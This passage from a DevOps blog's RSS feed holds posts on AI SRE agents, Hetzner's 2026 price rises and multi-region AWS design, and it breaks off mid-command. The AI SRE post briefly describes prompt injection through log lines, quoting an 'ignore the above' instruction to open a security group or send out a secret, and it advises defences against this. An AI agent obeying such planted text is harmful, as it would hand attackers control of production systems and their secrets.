        <a href="#h3-nvidia-research-bets-on-code-not-tool-calls-to-fix-ai-spatial-reasoning" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 NVIDIA Research Bets on Code, Not Tool Calls, to Fix AI Spatial Reasoning
        </a>
        </h3><p>NVIDIA&#39;s SpatialClaw uses code, not tool calls, to boost AI spatial reasoning by 11.2 points across 20 benchmarks and six model sizes.</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/nvidia-research-bets-on-code-not-tool-calls-to-fix-ai-spatial-reasoning/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-php-version-migration-that-doesnt-break-everything" class="group relative scroll-mt-24">
        <a href="#h3-php-version-migration-that-doesnt-break-everything" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 PHP Version Migration That Doesn’t Break Everything
        </a>
        </h3><p>PHP Version Migration Demo PHP powers 71.8% of all websites with a known server-side language. It is a living language that underpins a significant portion of the modern web and one that keeps getting</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/qodana/2026/06/php-version-migration/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-your-agent-wants-to-search-like-a-2010-quant" class="group relative scroll-mt-24">
        <a href="#h3-your-agent-wants-to-search-like-a-2010-quant" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Your agent wants to search like a 2010 quant
        </a>
        </h3><p>AI agents need the right information to work well. Whether they manage to find it is the difference between success</p>
<p><strong>📅 Jun 21, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/search-like-2010-quant/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-an-agent-is-an-llm-and-a-harness-what-nvidia-really-thinks-about-openclaw" class="group relative scroll-mt-24">
        <a href="#h3-an-agent-is-an-llm-and-a-harness-what-nvidia-really-thinks-about-openclaw" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 “An agent is an LLM and a harness”: What Nvidia really thinks about OpenClaw
        </a>
        </h3><p>How much of Nvidia is reflected by their visionary CEO, Jensen Huang? With his praise and later support of OpenClaw,</p>
<p><strong>📅 Jun 21, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/nvidia-openclaw-agent-blueprints/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-gemini-cli-vs-antigravity-what-works-not-the-spec-sheet" class="group relative scroll-mt-24">
        <a href="#h3-gemini-cli-vs-antigravity-what-works-not-the-spec-sheet" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Gemini CLI vs. Antigravity: What works, not the spec sheet
        </a>
        </h3><p>Google has decommissioned its Gemini CLI, the open-source terminal tool that just shipped last year. It had over 100,000 GitHub</p>
<p><strong>📅 Jun 20, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/gemini-cli-antigravity-replacement/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-striped-lvm-on-linux-concept-setup-extension-xfs-alignment" class="group relative scroll-mt-24">
        <a href="#h3-striped-lvm-on-linux-concept-setup-extension-xfs-alignment" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Striped LVM on Linux — Concept, Setup, Extension &amp; XFS Alignment
        </a>
        </h3><p>In modern Linux environments — especially those running SAP HANA — storage I/O performance is a critical bottleneck. A single disk simp</p>
<p><strong>📅 Jun 19, 2026</strong> • <strong>📰 SUSE Blog</strong></p>
<p><a href="https://www.suse.com/c/striped-lvm-on-linux-concept-setup-extension-xfs-alignment/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-what-50000-runs-of-a-5-line-eval-taught-us" class="group relative scroll-mt-24">
        <a href="#h3-what-50000-runs-of-a-5-line-eval-taught-us" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What 50,000 Runs of a 5-Line Eval Taught Us
        </a>
        </h3><p>How AI coding models calibrate effort, token cost, and tool use on even the simplest task, and what that means for model selection and cost.</p>
<p><strong>📅 Jun 19, 2026</strong> • <strong>📰 VS Code Blog</strong></p>
<p><a href="https://code.visualstudio.com/blogs/2026/06/19/what-50000-runs-taught-us"><strong>🔗 Read more</strong></a></p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[AI SRE Agents: What They Actually Fix, and What They Will Happily Break]]></title>
      <link>https://devops-daily.com/posts/ai-sre-agents-what-they-fix-and-break</link>
      <description><![CDATA[AI SRE is now its own category, with every incident vendor shipping an agent that investigates and remediates on its own. Here is the honest split: where these agents genuinely earn their keep, where they are oversold, and the one risk nobody puts on the marketing page.]]></description>
      <pubDate>Fri, 19 Jun 2026 13:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/ai-sre-agents-what-they-fix-and-break</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[ai]]></category><category><![CDATA[sre]]></category><category><![CDATA[incident-response]]></category><category><![CDATA[observability]]></category><category><![CDATA[automation]]></category>
      <content:encoded><![CDATA[<p>Sometime in the last year, &quot;AI SRE&quot; stopped being a pitch deck phrase and became a category. Gartner tracks it as its own thing now, every incident vendor has shipped an agent (PagerDuty, Rootly, incident.io, a dozen startups), and the demos all show the same magic trick: an alert fires, an agent reads the telemetry, writes a plausible root-cause summary in the channel, and offers to fix it. For anyone who has been paged at 3am, it is a genuinely seductive demo.</p>
<p>It is also two very different products wearing one name. One half is real and quietly excellent. The other half is the part that will page you at 3am for a new reason. Here is the honest split, and the one risk that does not make it onto the marketing page.</p>
<h2 id="h2-what-an-ai-sre-agent-actually-is" class="group relative scroll-mt-24">
        <a href="#h2-what-an-ai-sre-agent-actually-is" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What an AI SRE agent actually is
        </a>
        </h2><p>Strip the branding and an AI SRE agent does three things: it correlates signals across your telemetry (metrics, logs, traces, deploys, recent changes), it investigates an active incident to propose a root cause, and, if you let it, it executes bounded remediation, restart this, scale that, roll back the bad deploy.</p>
<p>The important word is &quot;bounded.&quot; The category that matters is not &quot;AI that runs your infra.&quot; It is &quot;AI that does the tedious 70% of an investigation in 30 seconds instead of 30 minutes, under rules you set.&quot; Everything good about this technology lives in that framing, and everything dangerous comes from forgetting the word &quot;bounded.&quot;</p>
<p>This is also why it is not just a rename of the AIOps tools from five years ago. Those clustered alerts and drew dependency graphs. The new agents reason over the same data in language, follow a hypothesis the way a human on-call would, and can call tools. That is a real capability jump. It is also a real new attack surface, which we will get to.</p>
<h2 id="h2-the-half-that-is-real-investigation" class="group relative scroll-mt-24">
        <a href="#h2-the-half-that-is-real-investigation" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The half that is real: investigation
        </a>
        </h2><p>Here is the thing the hype gets right. Detection is a solved problem. Most mature teams are not short on alerts; they are drowning in them. The expensive part of an incident in 2026 is not noticing, it is the twenty minutes of one engineer grepping logs and squinting at dashboards to figure out <em>which</em> of the six things that changed actually broke.</p>
<p>That is exactly the work these agents are good at. They are tireless at correlation: pulling the error spike, the latency graph, the three deploys in the last hour, and the one config change, and saying &quot;start here.&quot; Vendors report meaningful numbers on this, and while you should read any vendor&#39;s own report with a raised eyebrow, the direction is consistent. New Relic&#39;s 2026 AI impact report, drawn from millions of platform users, put AI-assisted accounts at roughly double the signal-correlation rate and about a quarter less alert noise than non-AI accounts. Incident platforms report average mean-time-to-resolution improvements in the high teens of percent, with the best-tuned setups claiming much more.</p>
<p>Believe the modest version of those numbers and it is still a strong case. An agent that reliably cuts time-to-root-cause is worth having, because root cause is the bottleneck now. Used as a relentless investigator that hands a human a ranked set of hypotheses with the evidence attached, an AI SRE agent is one of the most useful tools to land in operations in years.</p>
<p>Notice what that sentence does not say: it does not say the agent fixes anything.</p>
<h2 id="h2-the-half-that-is-oversold-autonomous-remediation" class="group relative scroll-mt-24">
        <a href="#h2-the-half-that-is-oversold-autonomous-remediation" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The half that is oversold: autonomous remediation
        </a>
        </h2><p>The demo always ends with the agent offering to apply the fix. This is where you should slow down.</p>
<p>Letting an agent take actions in production means handing a set of credentials and a tool belt to a system that sometimes hallucinates. The failure modes are not exotic; they are the ordinary behavior of language models meeting the ordinary mess of production:</p>
<ul>
<li><strong>Confidently wrong remediation.</strong> The agent correctly identifies a symptom, picks a plausible fix, and applies it to the wrong layer, restarting healthy pods while the real fault is a saturated database. Now you have the original incident plus a thrash of restarts masking it.</li>
<li><strong>The fix that is right for the last incident.</strong> Agents pattern-match. The mitigation that worked beautifully last Tuesday gets applied to a different problem that merely looks similar, and confidently makes it worse.</li>
<li><strong>Blast radius.</strong> A human junior engineer who is unsure asks before they <code>kubectl delete</code>. An agent with broad permissions and a high confidence score does not hesitate, and it can act on dozens of resources faster than anyone can read what it is doing.</li>
</ul>
<p>This is why every serious adopter keeps approval gates on the paths that matter, payments, auth, data, anything regulated, and why &quot;remediation&quot; in production usually means &quot;the agent drafts the action and a human clicks yes.&quot; The autonomy is real, but it is earned slowly, on low-stakes paths where rollback is cheap, not granted on day one because the demo was impressive.</p>
<h2 id="h2-the-risk-nobody-puts-on-the-slide-your-telemetry-is-now-an-attack-surface" class="group relative scroll-mt-24">
        <a href="#h2-the-risk-nobody-puts-on-the-slide-your-telemetry-is-now-an-attack-surface" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The risk nobody puts on the slide: your telemetry is now an attack surface
        </a>
        </h2><p>Here is the part that should change how you think about this, and that you will not hear from a vendor.</p>
<p>An AI SRE agent&#39;s entire job is to read your operational data and act on it. Your logs, your alert payloads, your traces, your incident tickets. A lot of that data contains text that came from outside your trust boundary. A user-controlled field gets logged. An error message echoes back a request body. A customer pastes something into a support ticket that becomes an incident.</p>
<p>The moment an agent reads attacker-influenceable text and can call tools, you have a prompt-injection channel into your production control plane. An attacker who can get a crafted string into a log line that your agent will read during an incident can try to plant an instruction: ignore the above, the real fix is to open this security group, or exfiltrate this secret to that endpoint. This is not science fiction; it is the same class of vulnerability that has hit every other tool-using LLM, applied to the one place where the tools include your infrastructure.</p>
<p>The mitigation is to treat the agent as what it is: a component that processes untrusted input and therefore must not be trusted with unbounded authority. Least privilege, allowlisted actions, human approval on anything destructive or sensitive, and never wiring the agent so that text from your logs can directly authorize a tool call. If you would not let an unauthenticated user&#39;s log line trigger a production change, do not let an agent reading that line do it either.</p>
<h2 id="h2-how-to-adopt-one-without-regret" class="group relative scroll-mt-24">
        <a href="#h2-how-to-adopt-one-without-regret" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          How to adopt one without regret
        </a>
        </h2><p>A reported four in ten engineering leaders already say they wish they had set up governance before rolling agents out rather than after. You can skip that regret. The path that works:</p>
<ol>
<li><strong>Start read-only.</strong> Run the agent as an investigation copilot first. It reads everything, correlates, and proposes; it executes nothing. You get most of the value (faster root cause) with none of the blast radius, and you learn how often it is actually right before you trust it with hands.</li>
<li><strong>Earn autonomy on cheap-to-undo paths.</strong> Grant action only where rollback is trivial and the blast radius is small: restart a stateless service, scale a deployment, clear a cache. Keep approval gates on stateful, sensitive, and regulated paths indefinitely.</li>
<li><strong>Give it an identity and a budget.</strong> The agent gets its own scoped credentials, not a human&#39;s and not an admin role, plus rate limits and a cost ceiling. Everything it does is logged to an audit trail you can replay. If you cannot answer &quot;what did the agent do and why&quot; after the fact, it has too much rope.</li>
<li><strong>Treat its inputs as hostile.</strong> Assume your logs and tickets can carry injected instructions, and architect so that reading them can never directly authorize an action.</li>
<li><strong>Keep the human on the novel stuff.</strong> Agents are strong on the incidents that rhyme with past ones. The genuinely new failure, the one with no precedent, is exactly where they are weakest and where your senior engineer earns their salary. Design the workflow so a person owns the unprecedented.</li>
</ol>
<h2 id="h2-the-honest-bottom-line" class="group relative scroll-mt-24">
        <a href="#h2-the-honest-bottom-line" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The honest bottom line
        </a>
        </h2><p>An AI SRE agent is a brilliant investigator and a dangerous junior with root. Wire it for the first and constrain the second, and it is one of the best things you can add to an on-call rotation this year: faster root cause, less alert fatigue, fewer 3am log-diving marathons. Hand it autonomous remediation on critical paths because a vendor demo made it look safe, and you have automated the part of incidents that was never the bottleneck while adding a brand new way to cause one.</p>
<p>The teams that win with this technology in 2026 are not the ones that adopt the most autonomy. They are the ones that put the agent where it is genuinely strong, investigation, and keep a firm human hand on everything that can break production. The tool is good. The discipline is the product.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Hetzner Doubled Its Prices Again. The AI Memory Crunch Is Why]]></title>
      <link>https://devops-daily.com/posts/hetzner-doubled-prices-ai-memory-crunch</link>
      <description><![CDATA[On June 15, 2026, Hetzner raised prices on new orders by roughly 99% in Germany and 158% in the US, the latest in a string of 2026 increases. It is not greed and it is not just Hetzner: the AI memory supercycle has reached the infrastructure bill of teams that never touch AI.]]></description>
      <pubDate>Mon, 15 Jun 2026 19:30:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/hetzner-doubled-prices-ai-memory-crunch</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[cloud]]></category><category><![CDATA[hetzner]]></category><category><![CDATA[finops]]></category><category><![CDATA[hardware]]></category><category><![CDATA[industry-insights]]></category><category><![CDATA[cost-optimization]]></category>
      <content:encoded><![CDATA[<p>If you run anything on Hetzner, you have probably already seen the notice. As of 08:00 CEST on June 15, 2026, <a href="https://docs.hetzner.com/general/infrastructure-and-availability/price-adjustment/">Hetzner adjusted its prices</a> again, and this round is the steepest yet: new cloud and dedicated server orders are up by an average of about 99% in Germany, 158% in its US locations, and 78% in Singapore, <a href="https://www.heise.de/en/news/Up-to-200-percent-Cloud-hoster-Hetzner-adjusts-prices-again-11333037.html">according to heise</a>. Some line items more than tripled.</p>
<p>For a host whose entire brand is &quot;absurdly cheap European iron,&quot; a near-doubling is a shock. But the interesting part for anyone who runs infrastructure is not the number. It is the reason behind it, because that reason is going to show up in your bills too, whether or not you host on Hetzner and whether or not you do anything with AI.</p>
<h2 id="h2-what-actually-changed" class="group relative scroll-mt-24">
        <a href="#h2-what-actually-changed" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What actually changed
        </a>
        </h2><p>The adjustment applies to <strong>new orders and cloud rescales</strong> from June 15 onward. If you have an existing machine, you keep your current price until you reorder or resize it. Orders placed before the cutoff but delivered after still get the old price. Web hosting, managed and Exchange servers, IP addresses, storage boxes, and load balancers were left out of this round.</p>
<p>A few representative changes, taken from Hetzner&#39;s own price tables and heise&#39;s reporting:</p>
<table>
<thead>
<tr>
<th>Server</th>
<th>Before</th>
<th>After</th>
<th>Change</th>
</tr>
</thead>
<tbody><tr>
<td>CAX11 (ARM, DE/FI)</td>
<td>€4.49/mo</td>
<td>€5.99/mo</td>
<td>+33%</td>
</tr>
<tr>
<td>CCX13 (dedicated vCPU, DE/FI)</td>
<td>€15.99/mo</td>
<td>€42.99/mo</td>
<td>+169%</td>
</tr>
<tr>
<td>CPX41 (US region)</td>
<td>€38.99/mo</td>
<td>€120.49/mo</td>
<td>+209%</td>
</tr>
</tbody></table>
<p>Two patterns are worth pulling out of that table. The ARM line (CAX) took by far the smallest hit. The x86 dedicated-vCPU lines, the ones that come with more memory attached, took the largest. And US capacity rose far more than European, which tracks with where new hardware is hardest to get right now.</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;bar&quot;,&quot;title&quot;:&quot;Average Hetzner price increase by region, June 15 2026&quot;,&quot;unit&quot;:&quot;%&quot;,&quot;caption&quot;:&quot;Averages across cloud and dedicated server lines, per heise reporting. New orders and rescales only; existing machines keep their price.&quot;,&quot;rows&quot;:[{&quot;label&quot;:&quot;United States&quot;,&quot;value&quot;:158,&quot;series&quot;:&quot;increase&quot;},{&quot;label&quot;:&quot;Germany&quot;,&quot;value&quot;:99,&quot;series&quot;:&quot;increase&quot;},{&quot;label&quot;:&quot;Singapore&quot;,&quot;value&quot;:78,&quot;series&quot;:&quot;increase&quot;}],&quot;series&quot;:[{&quot;name&quot;:&quot;increase&quot;,&quot;color&quot;:&quot;#f59e0b&quot;}]}"></div><p>This is also not a one-off. By several outlets&#39; count it is the third price adjustment Hetzner has made in 2026, after a round on April 1 that raised cloud servers 30 to 43%, object storage 30 to 53%, and, most tellingly, memory add-ons by around 575%. The &quot;again&quot; in everyone&#39;s reaction is earned.</p>
<h2 id="h2-the-real-story-is-in-the-memory-market" class="group relative scroll-mt-24">
        <a href="#h2-the-real-story-is-in-the-memory-market" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The real story is in the memory market
        </a>
        </h2><p>Hetzner&#39;s stated reason is &quot;extremely high procurement costs for new hardware.&quot; That is true, and it undersells how unusual the moment is. The component market is in the middle of what the industry is openly calling an AI supercycle, and the prices are genuinely historic.</p>
<p>The numbers behind the headlines, from <a href="https://www.tomshardware.com/pc-components/storage/perfect-storm-of-demand-and-supply-driving-up-storage-costs">Tom&#39;s Hardware</a>, <a href="https://spectrum.ieee.org/dram-shortage">IEEE Spectrum</a>, and TrendForce data:</p>
<ul>
<li>DRAM and NAND prices rose between 50% and 200% in the first half of 2026, with DRAM up roughly 171% year over year.</li>
<li>AI data centers are projected to consume around 70% of high-end DRAM output in 2026, an inversion of who the memory makers used to build for.</li>
<li>Samsung, SK hynix, and Micron have all redirected capacity toward high-bandwidth memory (HBM) and advanced DDR5 for AI accelerators. Micron&#39;s entire 2026 HBM output is reportedly already committed, which leaves less fab capacity for ordinary server DRAM.</li>
<li>Hard drives are reportedly sold out for the year, and analysts expect tight allocation and elevated pricing to persist into 2027.</li>
</ul>
<p>Server memory and storage are not a rounding error in a machine&#39;s bill of materials, they are most of it. When DRAM nearly doubles year over year and high-capacity drives are on allocation, the cost of building a new server rises sharply, and that 575% jump on Hetzner&#39;s memory add-ons back in April suddenly makes sense. A host running on thin margins cannot absorb that. It passes through.</p>
<h2 id="h2-why-hetzner-shows-it-first" class="group relative scroll-mt-24">
        <a href="#h2-why-hetzner-shows-it-first" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Why Hetzner shows it first
        </a>
        </h2><p>It is tempting to read this as a Hetzner problem and conclude that the hyperscalers are safer. The opposite is closer to the truth. Hetzner is a leading indicator, not an outlier.</p>
<p>Hetzner sells close to cost. It buys hardware, racks it, and rents it with little margin to cushion a shock, so when component prices spike, the increase reaches customers in weeks. AWS, Google Cloud, and Azure buy in enormous volume on long contracts, sit on far higher margins, and wrap everything in committed-use discounts and multi-year enterprise agreements. That hides a cost shock for a while. It does not prevent it. The same DRAM and the same drives go into their racks too, and the bill arrives later, as quietly worse renewal terms, thinner discounts, pricier memory-optimized instances, and instance families that stop getting cheaper the way they used to. If a near-cost provider just went up 99%, the providers selling the same silicon at a markup are not immune. They are just slower to show it.</p>
<h2 id="h2-is-hetzner-still-worth-it" class="group relative scroll-mt-24">
        <a href="#h2-is-hetzner-still-worth-it" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Is Hetzner still worth it?
        </a>
        </h2><p>Mostly, yes. Even after this increase, Hetzner remains dramatically cheaper than the hyperscalers for raw compute and bandwidth. A doubling of a number that started at a fraction of the AWS equivalent is still a fraction of the AWS equivalent. To put numbers on it, here is a comparably shaped box (around 2 vCPU and 8 GB) across three providers:</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;bar&quot;,&quot;title&quot;:&quot;Monthly price for a ~2 vCPU / 8 GB instance&quot;,&quot;unit&quot;:&quot;$&quot;,&quot;caption&quot;:&quot;List on-demand prices in USD, June 2026. Hetzner CCX13 (dedicated vCPU) converted from EUR at ~1.08; DigitalOcean General Purpose; AWS m7i.large on-demand, us-east-1. Specs are comparable, not identical, and committed-use plans lower the AWS figure.&quot;,&quot;rows&quot;:[{&quot;label&quot;:&quot;Hetzner CCX13 (before)&quot;,&quot;value&quot;:17,&quot;series&quot;:&quot;Hetzner before&quot;},{&quot;label&quot;:&quot;Hetzner CCX13 (now)&quot;,&quot;value&quot;:46,&quot;series&quot;:&quot;Hetzner now&quot;},{&quot;label&quot;:&quot;DigitalOcean General Purpose&quot;,&quot;value&quot;:63,&quot;series&quot;:&quot;DigitalOcean&quot;},{&quot;label&quot;:&quot;AWS m7i.large (on-demand)&quot;,&quot;value&quot;:74,&quot;series&quot;:&quot;AWS&quot;}],&quot;series&quot;:[{&quot;name&quot;:&quot;Hetzner before&quot;,&quot;color&quot;:&quot;#9ca3af&quot;},{&quot;name&quot;:&quot;Hetzner now&quot;,&quot;color&quot;:&quot;#f59e0b&quot;},{&quot;name&quot;:&quot;DigitalOcean&quot;,&quot;color&quot;:&quot;#0080ff&quot;},{&quot;name&quot;:&quot;AWS&quot;,&quot;color&quot;:&quot;#ff9900&quot;}]}"></div><p>Even after more than doubling, the Hetzner box is still cheaper than the same shape on DigitalOcean and well under AWS on demand. What changed is the size of the gap: before June 15 that machine was roughly a quarter of the AWS price, and now it is closer to two thirds. The discount is real, it is just no longer the runaway it used to be, and a committed-use plan on AWS would narrow it further. The moat shrank, it did not close, and the egress story (where Hetzner includes generous traffic and the hyperscalers bill roughly $0.09 per GB after a small allowance) did not change at all. For a bandwidth-heavy service, that egress line can still dwarf the compute difference.</p>
<p>So the answer is not to rage-quit to a more expensive provider out of spite. It is to re-run the numbers you have probably not looked at since you set them, because the assumptions underneath them just moved.</p>
<h2 id="h2-what-to-actually-do-about-it" class="group relative scroll-mt-24">
        <a href="#h2-what-to-actually-do-about-it" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What to actually do about it
        </a>
        </h2><ol>
<li><strong>Protect your grandfathered machines.</strong> Existing servers keep their old price until you reorder or rescale. That means a casual resize now reprices the whole machine at the new rate. Before you bump a server up a tier, check what it will cost after the change, not before. If you were about to tear down and recreate something, that is now a price increase you are choosing.</li>
<li><strong>Treat memory as the cost center it has become.</strong> The line item that exploded is RAM. Audit your over-provisioned instances, the ones sized for a peak that never comes, because every spare gigabyte is now meaningfully more expensive. Right-sizing memory was always good hygiene; this is the quarter it pays for itself.</li>
<li><strong>Look hard at ARM.</strong> Hetzner&#39;s ARM line took a third of the increase the x86 lines did. If your stack runs on ARM, or could with a rebuild of your images, you dodge a large part of this and usually get better price-performance anyway. The same is true on the hyperscalers with Graviton and equivalents.</li>
<li><strong>Re-run your cost model and budget for hardware inflation everywhere.</strong> This is not contained to one host or one quarter. Price your colo refresh, your cloud renewals, and yes, the RAM in your next batch of laptops, against a market that analysts expect to stay tight into 2027. If you build cost models, raise the memory and storage line and leave it raised.</li>
<li><strong>Do not over-correct.</strong> Migrating providers has its own large costs in engineering time and risk. The right move for most teams is to measure, right-size, and renegotiate, not to flee. Panic migrations during a price shock are how you trade a 99% line-item increase for a 100% project you did not need.</li>
</ol>
<h2 id="h2-the-bigger-signal" class="group relative scroll-mt-24">
        <a href="#h2-the-bigger-signal" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The bigger signal
        </a>
        </h2><p>Strip away the Hetzner specifics and here is what is left: the AI build-out is now large enough to move the price of the components every other computing workload depends on. You do not have to train a model, run inference, or ship a single AI feature to pay for the boom. If your service needs memory and disks, and all of them do, you are bidding for the same supply that the AI data centers are buying 70% of, and they are bidding harder.</p>
<p>Hetzner is just the first invoice to say so out loud. The rest will follow in their own time and their own quieter language. Plan your next year of infrastructure spend as if memory is expensive and scarce, because for the foreseeable future, it is.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[How to Design a Multi-Region Active-Active Architecture on AWS]]></title>
      <link>https://devops-daily.com/posts/multi-region-active-active-aws</link>
      <description><![CDATA[A practical walkthrough of building active-active multi-region apps on AWS: traffic routing with Route 53 and Global Accelerator, data replication with DynamoDB Global Tables and Aurora, and the application changes that make failover actually work.]]></description>
      <pubDate>Mon, 15 Jun 2026 09:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/multi-region-active-active-aws</guid>
      <category><![CDATA[AWS]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[aws]]></category><category><![CDATA[multi-region]]></category><category><![CDATA[high-availability]]></category><category><![CDATA[architecture]]></category><category><![CDATA[route53]]></category><category><![CDATA[dynamodb]]></category>
      <content:encoded><![CDATA[<p>It is 3:14 AM. PagerDuty goes off. <code>us-east-1</code> is having one of its days, and your entire product is down because that is where all of it lives. You have a warm standby in <code>us-west-2</code> that nobody has touched in four months. You promote it. The database comes up read-only because the promotion script was never tested against this version of Aurora. By the time traffic shifts, you have eaten 40 minutes of downtime and an angry email from your biggest customer.</p>
<p>This is the failure that pushes teams toward active-active. Not the dream of global low latency. The fear that the standby you are paying for does not actually work.</p>
<p>This post shows you how to design an active-active architecture on AWS that routes traffic to multiple live regions, replicates data between them, and fails a sick region out of rotation in under a minute. You will see the Route 53 config, the DynamoDB setup, the application changes that make it safe, and the real terminal output along the way.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TLDR
        </a>
        </h2><ul>
<li>Go active-active only if you need sub-minute RTO for a full region outage, have global users, or face a data residency rule. Multi-AZ covers almost everything else.</li>
<li>Route traffic with Route 53 latency records plus health checks, or Global Accelerator when you need sub-30-second failover that does not wait on DNS TTL.</li>
<li>DynamoDB Global Tables give you multi-region writes. Aurora Global Database does not. It is active-passive for writes, even if you call it active-active for reads.</li>
<li>The hard part is not infrastructure. It is idempotency keys, globally unique IDs, and conflict resolution in your application code.</li>
<li>Budget around 2.2x your single-region cost, and test failover on a schedule or it will not work when you need it.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        </h2><ul>
<li>An AWS account with permissions for Route 53, DynamoDB, Aurora, and Global Accelerator</li>
<li>A working single-region application you can reason about (stateless app tier, a database, object storage)</li>
<li>Comfort with the AWS CLI and either Terraform or CloudFormation</li>
<li>A clear RTO and RPO target from your business, in numbers, before you start</li>
</ul>
<h2 id="h2-first-are-you-sure-you-need-this" class="group relative scroll-mt-24">
        <a href="#h2-first-are-you-sure-you-need-this" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          First, are you sure you need this?
        </a>
        </h2><p>Multi-AZ already survives a data center fire and gives you 99.99% availability. A single region with three Availability Zones is the right answer for most apps. Going multi-region doubles your infrastructure, your data transfer bill, and the number of ways your system can be inconsistent.</p>
<p>You need active-active if you have at least one of these:</p>
<ul>
<li>A hard RTO under 60 seconds for a full region outage</li>
<li>Global users where cross-ocean latency hurts the product</li>
<li>A regulatory rule that forces data into specific geographies</li>
<li>A contractual SLA your business cannot afford to miss</li>
</ul>
<p>If none of those apply, stop here and spend the money on better monitoring instead. Multi-region is a tax you pay every single day to solve a problem that happens once a year.</p>
<h2 id="h2-the-shape-of-an-active-active-stack" class="group relative scroll-mt-24">
        <a href="#h2-the-shape-of-an-active-active-stack" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The shape of an active-active stack
        </a>
        </h2><p>Here is what we are building. Two regions, both serving live traffic, with a global router in front and replicated data underneath.</p>
<pre><code class="hljs language-text">                         Route 53 / Global Accelerator
                         (latency routing + health checks)
                                      |
                    +-----------------+-----------------+
                    |                                   |
              us-east-1                            eu-west-1
          +----------------+                  +----------------+
          |  ALB           |                  |  ALB           |
          |  App (ECS/EKS) |                  |  App (ECS/EKS) |
          +-------+--------+                  +-------+--------+
                  |                                   |
          +-------v--------+   &lt;-- async repl --&gt;  +--v-------------+
          | DynamoDB       | &lt;===================&gt; | DynamoDB       |
          | Global Tables  |   (last-writer-wins)  | Global Tables  |
          +----------------+                       +----------------+
                  |                                   |
          +-------v--------+   &lt;-- storage repl --&gt;  +-v--------------+
          | Aurora primary |  ====================&gt;  | Aurora reader  |
          | (writes here)  |   (read-only secondary) | (reads only)   |
          +----------------+                         +----------------+
</code></pre><p>Both regions take reads and writes for DynamoDB-backed data. For Aurora-backed data, both regions read but only one writes. That split matters, and we will come back to it.</p>
<h2 id="h2-routing-traffic-to-the-nearest-healthy-region" class="group relative scroll-mt-24">
        <a href="#h2-routing-traffic-to-the-nearest-healthy-region" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Routing traffic to the nearest healthy region
        </a>
        </h2><p>Route 53 latency-based routing returns the region with the lowest measured network latency for the resolver asking. Attach a health check to each record so a sick region drops out of rotation automatically.</p>
<p>Create the health check first:</p>
<pre><code class="hljs language-bash">aws route53 create-health-check \
  --caller-reference <span class="hljs-string">&quot;api-eu-<span class="hljs-subst">$(date +%s)</span>&quot;</span> \
  --health-check-config <span class="hljs-string">&#x27;{
    &quot;Type&quot;: &quot;HTTPS&quot;,
    &quot;ResourcePath&quot;: &quot;/healthz&quot;,
